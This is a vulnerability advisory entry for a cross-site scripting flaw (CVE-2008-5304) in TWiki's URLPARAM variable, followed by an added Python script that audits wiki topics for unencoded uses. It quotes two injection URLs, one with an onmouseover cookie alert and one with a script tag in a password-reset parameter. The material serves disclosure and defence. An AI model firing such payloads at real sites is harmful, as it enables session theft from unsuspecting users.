TWiki URLPARAM Variable Cross-Site Scripting Vulnerability

Vulnerability ID: 1116953
Vulnerability type: Cross-site scripting
Published: 2008-12-06
Updated: 2008-12-11
CVE ID: CVE-2008-5304
CNNVD-ID: CNNVD-200812-154
Platform: PHP
CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/32646
https://www.securityfocus.com/bid/32669
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-154
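|Vulnerability details
TWiki is a flexible, easy-to-use and powerful enterprise collaboration platform and knowledge management system. The %URLPARAM{}% TWiki variable is a command used to create dynamic wiki content and wiki applications. If URLPARAM is used in an HTML form field value without proper encoding, it can lead to a cross-site scripting attack. For example, an attacker can create a city URL parameter, use a double quote to close the input value="" attribute, and then add further attributes.
|Exploit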
source: http://www.securityfocus.com/bid/32669/info

TWiki is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

An HTML form field must exist containing an input value without specifying an encoding. As an example:

<input type="text" name="city" value="%URLPARAM{ "city" }%" />

The following examples will then demonstrate this issue:

http://example.com/twiki/view/TWiki/WebSearch?search=%27a%20onmouseover=alert(document.cookie)%20%27

http://example.com/twiki/view/TWiki/ResetPassword?username="<script language=Javascript>alert('3y3 0wn j00 TWIKI')</script>
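
An added audit example (not part of the original advisory or of TWiki's code): a Python script that scans topic text for %URLPARAM{}% uses without encode="entity" and marks those that sit inside a double-quoted HTML attribute value, as in the form field above. The function names and the sample topic are constructed for illustration, and it assumes URLPARAM's encode="entity" option is the encoding wanted for HTML form values.

```python
import re

# Matches a %URLPARAM{ ... }% variable and captures its argument string.
URLPARAM_RE = re.compile(r'%URLPARAM\{(.*?)\}%', re.DOTALL)


def parse_args(arg_string):
    """Split '"name" key="value" ...' TWiki-style arguments into a dict."""
    args = {}
    default = re.match(r'\s*"([^"]*)"', arg_string)
    if default:
        args["_DEFAULT"] = default.group(1)
    for key, value in re.findall(r'(\w+)\s*=\s*"([^"]*)"', arg_string):
        args[key] = value
    return args


def in_attribute_value(text, pos):
    """True if pos sits inside an open double-quoted HTML attribute value."""
    tag_start = text.rfind("<", 0, pos)
    if tag_start == -1 or text.rfind(">", 0, pos) > tag_start:
        return False
    return text.count('"', tag_start, pos) % 2 == 1


def audit_topic(text):
    """Findings for URLPARAM uses lacking encode="entity" (assumed the safe choice)."""
    findings = []
    for m in URLPARAM_RE.finditer(text):
        args = parse_args(m.group(1))
        if args.get("encode", "").lower() == "entity":
            continue
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "param": args.get("_DEFAULT", "?"),
            "in_attribute": in_attribute_value(text, m.start()),
        })
    return findings


# Constructed sample topic text (not from a real TWiki installation).
SAMPLE_TOPIC = '''<form action="%SCRIPTURL{view}%/%WEB%/%TOPIC%">
<input type="text" name="city" value="%URLPARAM{ "city" }%" />
<input type="text" name="zip" value="%URLPARAM{ "zip" encode="entity" }%" />
You searched for: %URLPARAM{ "q" }%
</form>'''

if __name__ == "__main__":
    for finding in audit_topic(SAMPLE_TOPIC):
        print(finding)
```

Findings with in_attribute set match the form-field pattern shown above and are the ones to fix first.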
|Affected products
TWiki TWiki 4.2.3
TWiki TWiki 4.2.2
TWiki TWiki 4.2.1
TWiki TWiki 4.2
TWiki TWiki 4.1.2
TWiki TWiki 4.1.1
TWiki TWiki 4.1
TWiki TWiki 4.
|References

Source: twiki.org/cgi-bin
Link: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2008-5304
Source: XF
Name: twiki-urlparam-xss(47122)
Link: http://xforce.iss.net/xforce/xfdb/47122
Source: VUPEN
Name: ADV-2008-3381
Link: http://www.vupen.com/english/advisories/2008/3381
Source: BID
Name: 32669
Link: http://www.securityfocus.com/bid/32669
Source: SECTRACK
Name: 1021351
Link: http://securitytracker.com/id?1021351
Source: SECUNIA
Name: 33040
Link: http://secunia.com/advisories/33040